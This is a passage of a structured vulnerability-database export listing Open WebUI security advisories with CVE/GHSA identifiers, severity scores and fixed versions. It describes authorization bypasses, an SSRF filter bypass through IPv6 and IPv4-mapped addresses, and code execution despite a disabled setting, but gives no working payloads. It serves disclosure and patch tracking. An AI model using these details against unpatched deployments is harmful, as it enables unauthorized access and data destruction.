reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-24c9-2m8q-qhmh
reference_id GHSA-24c9-2m8q-qhmh
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:20:31Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-24c9-2m8q-qhmh
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45338, GHSA-24c9-2m8q-qhmh
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-q682-k826-efhv
48
url VCID-qgfh-7u8n-y7c7
vulnerability_id VCID-qgfh-7u8n-y7c7
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, any authenticated user can permanently delete files owned by other users via DELETE /api/v1/files/{id} when the target file is referenced in any shared chat. The has_access_to_file() authorization gate unconditionally grants access through its shared-chat branch. It checks neither the requesting user's identity nor the type of operation being performed. File UUIDs (which would otherwise be impractical to guess) are disclosed to any user with read access to a knowledge base via GET /api/v1/knowledge/{id}/files. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45671
reference_id
reference_type
scores
0
value 0.00045
scoring_system epss
scoring_elements 0.14556
published_at 2026-06-12T12:55:00Z
1
value 0.00045
scoring_system epss
scoring_elements 0.14528
published_at 2026-06-14T12:55:00Z
2
value 0.00045
scoring_system epss
scoring_elements 0.14436
published_at 2026-06-11T12:55:00Z
3
value 0.00045
scoring_system epss
scoring_elements 0.14553
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45671
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/2e52ad8ff2f8d9ed9f38f76e9bc19c8f92d91fc3
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/2e52ad8ff2f8d9ed9f38f76e9bc19c8f92d91fc3
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45671
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45671
5
reference_url https://github.com/advisories/GHSA-26g9-27vm-x3q8
reference_id GHSA-26g9-27vm-x3q8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-26g9-27vm-x3q8
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-26g9-27vm-x3q8
reference_id GHSA-26g9-27vm-x3q8
reference_type
scores
0
value 8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-15T21:11:03Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-26g9-27vm-x3q8
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45671, GHSA-26g9-27vm-x3q8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qgfh-7u8n-y7c7
49
url VCID-qjt1-zxx8-r7ht
vulnerability_id VCID-qjt1-zxx8-r7ht
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the POST /api/v1/retrieval/process/web endpoint accepts a user-supplied collection_name and an overwrite query parameter (default: True). It performs no authorization check on whether the calling user owns or has write access to the target collection. When overwrite=True, save_docs_to_vector_db calls VECTOR_DB_CLIENT.delete_collection() on the target collection before writing new content. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44554
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.13702
published_at 2026-06-12T12:55:00Z
1
value 0.00043
scoring_system epss
scoring_elements 0.13679
published_at 2026-06-14T12:55:00Z
2
value 0.00043
scoring_system epss
scoring_elements 0.13586
published_at 2026-06-11T12:55:00Z
3
value 0.00043
scoring_system epss
scoring_elements 0.13704
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44554
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44554
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44554
3
reference_url https://github.com/advisories/GHSA-7r82-qhg4-6wvj
reference_id GHSA-7r82-qhg4-6wvj
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7r82-qhg4-6wvj
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-7r82-qhg4-6wvj
reference_id GHSA-7r82-qhg4-6wvj
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-15T21:09:13Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-7r82-qhg4-6wvj
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44554, GHSA-7r82-qhg4-6wvj
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qjt1-zxx8-r7ht
50
url VCID-r7vt-4bqm-f7hb
vulnerability_id VCID-r7vt-4bqm-f7hb
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the GET /api/v1/channels/{id}/members endpoint only checks membership for group and dm channel types (lines 467-469). For standard channels — including private ones — there is no channel_has_access check before returning the member list. Any authenticated user who knows a private channel's UUID can enumerate all users with access to that channel. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44559
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09067
published_at 2026-06-12T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09057
published_at 2026-06-14T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09019
published_at 2026-06-11T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09069
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44559
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44559
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44559
3
reference_url https://github.com/advisories/GHSA-c7wp-3qh5-55pv
reference_id GHSA-c7wp-3qh5-55pv
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c7wp-3qh5-55pv
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-c7wp-3qh5-55pv
reference_id GHSA-c7wp-3qh5-55pv
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T20:28:01Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-c7wp-3qh5-55pv
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44559, GHSA-c7wp-3qh5-55pv
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-r7vt-4bqm-f7hb
51
url VCID-reqw-pfm8-c7g5
vulnerability_id VCID-reqw-pfm8-c7g5
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.12, the /api/v1/utils/code/execute endpoint executes arbitrary Python code via Jupyter for any verified user, even when the admin has set ENABLE_CODE_EXECUTION=false. The feature gate is not enforced on the API endpoint — the configuration says "disabled" but code still executes. This vulnerability is fixed in 0.8.12.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45672
reference_id
reference_type
scores
0
value 0.00079
scoring_system epss
scoring_elements 0.23672
published_at 2026-06-12T12:55:00Z
1
value 0.00079
scoring_system epss
scoring_elements 0.23663
published_at 2026-06-14T12:55:00Z
2
value 0.00079
scoring_system epss
scoring_elements 0.23475
published_at 2026-06-11T12:55:00Z
3
value 0.00079
scoring_system epss
scoring_elements 0.23682
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45672
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/6d736d3c598dbe49488675ed42845e00b62dfcba
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/6d736d3c598dbe49488675ed42845e00b62dfcba
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.12
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.12
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45672
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45672
5
reference_url https://github.com/advisories/GHSA-482j-2pq6-q5w4
reference_id GHSA-482j-2pq6-q5w4
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-482j-2pq6-q5w4
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-482j-2pq6-q5w4
reference_id GHSA-482j-2pq6-q5w4
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T19:37:06Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-482j-2pq6-q5w4
fixed_packages
0
url pkg:pypi/open-webui@0.8.12
purl pkg:pypi/open-webui@0.8.12
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-8nzh-cpda-dkca
13
vulnerability VCID-8y4k-pj2n-8uhm
14
vulnerability VCID-chug-ma8r-cucc
15
vulnerability VCID-cw4k-3s8z-uqh8
16
vulnerability VCID-dz6g-jgmg-wqce
17
vulnerability VCID-dzh3-rqx4-fqhv
18
vulnerability VCID-ef1t-pxjm-j7cz
19
vulnerability VCID-hj5f-yk3y-ffdg
20
vulnerability VCID-jfs9-dps1-27a2
21
vulnerability VCID-n4ma-zcpv-5fbp
22
vulnerability VCID-nxvm-97r4-6ybz
23
vulnerability VCID-pkds-1xgn-q3bv
24
vulnerability VCID-q682-k826-efhv
25
vulnerability VCID-qgfh-7u8n-y7c7
26
vulnerability VCID-qjt1-zxx8-r7ht
27
vulnerability VCID-r7vt-4bqm-f7hb
28
vulnerability VCID-rhhj-rccv-87hw
29
vulnerability VCID-s625-eg1w-gfd1
30
vulnerability VCID-t571-d65a-cyb2
31
vulnerability VCID-vghe-uuzj-m7cu
32
vulnerability VCID-vkx3-71kv-sugt
33
vulnerability VCID-w2vd-r3hr-w3bt
34
vulnerability VCID-wcz4-vwx4-tufb
35
vulnerability VCID-yug9-shts-kufb
36
vulnerability VCID-yysb-dk2k-f7g4
37
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.12
aliases CVE-2026-45672, GHSA-482j-2pq6-q5w4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-reqw-pfm8-c7g5
52
url VCID-rhhj-rccv-87hw
vulnerability_id VCID-rhhj-rccv-87hw
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, validate_url() in backend/open_webui/retrieval/web/utils.py calls validators.ipv6(ip, private=True), but the validators library does NOT implement the private keyword for IPv6 — the call raises a ValidationError (which is falsy in a boolean context), so every IPv6 address passes the filter. In addition, IPv4-mapped IPv6 (::ffff:10.0.0.1) bypasses the IPv4 check entirely, and several reserved IPv4 ranges (0.0.0.0/8, 100.64.0.0/10, 192.0.0.0/24, etc.) are not blocked. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45331
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02148
published_at 2026-06-14T12:55:00Z
1
value 0.00013
scoring_system epss
scoring_elements 0.02139
published_at 2026-06-11T12:55:00Z
2
value 0.00013
scoring_system epss
scoring_elements 0.02138
published_at 2026-06-13T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.02142
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45331
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45331
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45331
4
reference_url https://github.com/advisories/GHSA-4v7r-f4w8-8972
reference_id GHSA-4v7r-f4w8-8972
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4v7r-f4w8-8972
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-4v7r-f4w8-8972
reference_id GHSA-4v7r-f4w8-8972
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:14:00Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-4v7r-f4w8-8972
6
reference_url https://github.com/advisories/GHSA-c6xv-rcvw-v685
reference_id GHSA-c6xv-rcvw-v685
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-c6xv-rcvw-v685
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45331, GHSA-4v7r-f4w8-8972
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rhhj-rccv-87hw
53
url VCID-s625-eg1w-gfd1
vulnerability_id VCID-s625-eg1w-gfd1
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the /api/generate, /api/embed, /api/embeddings, and /api/show endpoints accept any model name from the user and forward the request to the Ollama backend without checking whether the user is authorized to access that model. These endpoints only require get_verified_user (any authenticated non-pending user) and validate that the model exists in the full unfiltered model list, but never check AccessGrants.has_access(). This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44563
reference_id
reference_type
scores
0
value 0.0004
scoring_system epss
scoring_elements 0.12486
published_at 2026-06-14T12:55:00Z
1
value 0.0004
scoring_system epss
scoring_elements 0.12406
published_at 2026-06-11T12:55:00Z
2
value 0.0004
scoring_system epss
scoring_elements 0.12506
published_at 2026-06-13T12:55:00Z
3
value 0.0004
scoring_system epss
scoring_elements 0.12498
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44563
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44563
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44563
3
reference_url https://github.com/advisories/GHSA-rcvp-6fgw-c7fh
reference_id GHSA-rcvp-6fgw-c7fh
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rcvp-6fgw-c7fh
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-rcvp-6fgw-c7fh
reference_id GHSA-rcvp-6fgw-c7fh
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T14:32:02Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-rcvp-6fgw-c7fh
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44563, GHSA-rcvp-6fgw-c7fh
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-s625-eg1w-gfd1
54
url VCID-t571-d65a-cyb2
vulnerability_id VCID-t571-d65a-cyb2
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, he LDAP and OAuth authentication flows use a TOCTOU (Time-of-Check-Time-of-Use) pattern for first-user admin role assignment. The regular signup handler (signup_handler in auths.py, line 663) was explicitly patched to prevent this race with the comment "Insert with default role first to avoid TOCTOU race", but the LDAP and OAuth code paths were never updated with the same fix. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45675
reference_id
reference_type
scores
0
value 0.00114
scoring_system epss
scoring_elements 0.29641
published_at 2026-06-11T12:55:00Z
1
value 0.00114
scoring_system epss
scoring_elements 0.29841
published_at 2026-06-14T12:55:00Z
2
value 0.00114
scoring_system epss
scoring_elements 0.29838
published_at 2026-06-12T12:55:00Z
3
value 0.00114
scoring_system epss
scoring_elements 0.29856
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45675
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45675
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
